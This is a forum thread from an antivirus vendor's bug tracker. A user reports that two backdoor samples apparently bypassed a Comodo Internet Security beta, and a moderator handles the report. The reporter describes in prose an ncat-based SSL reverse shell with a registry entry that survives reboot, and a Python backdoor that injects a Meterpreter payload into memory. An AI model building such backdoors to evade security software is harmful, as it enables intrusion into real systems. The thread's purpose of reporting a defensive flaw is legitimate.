CIS Bypassed By BackDoor Malware [V7B][M824]


  1. Product version: COMODO Internet Security 7.0.308911.4080 BETA
    2.Operating System:xp3 (x32) runing by VMware Player
    3.Configuration: Default IS configuration
  2. link test back door 1 in partially limited
    .link test back door 2
    link test back boor 1 and 2 in limited

Comodo has known issues with VirtualBox…try it on VMware Player.

ok :azn:

If this does replicate on VMWare please also edit your first post such that it is in the format provided here:

This will ensure that the devs have enough information to replicate this.


Has been re-test by VMware Player

Thank you. Could you please summarize what exactly these pieces of malware are able to do?

Thanks again.

backe door 1

it is ncat tool used as backdoor acting as shell (on target ) for a server on attacker system and packed with bat.file
role of bat.file

  • allow command of ncat on target for connection to server through ssl encrypted package
    -making regestry value for ncat which allow backdoor working after reboot

back door 2

it is encrypted python backdoor which inject powershell into memory in virtual alloc pattern using meterpreter payload

Is it also able to bypass Limited? If so what about Restricted?

link back boor 1 and 2 :wink:

Thank you. Could you please edit your first post so that it is in the required format. Also, please attach a diagnostics report.

In addition, could you please PM me a download link for the POC? I will adhere to the rules you presented in your other bug report, and in addition I promise not to share it with any other users. I will just put a download link in the tracker so the devs can use this for testing.

Thank you.

Thank you very much for your report in standard format, with all information supplied. The care you have taken is much appreciated by Comodo, and will increase the likelihood that this bug can be fixed.

Developers may or may not communicate with you in the forum or by PM/IM, depending on time availability and need. Because you have supplied complete information they may be able to replicate and fix the bug without doing so.

Many thanks again.

From my understanding, the devs have not been able to confirm this as a legitimate bypass. Thus, I will move this to Resolved. I will let you know if I receive an update on this status.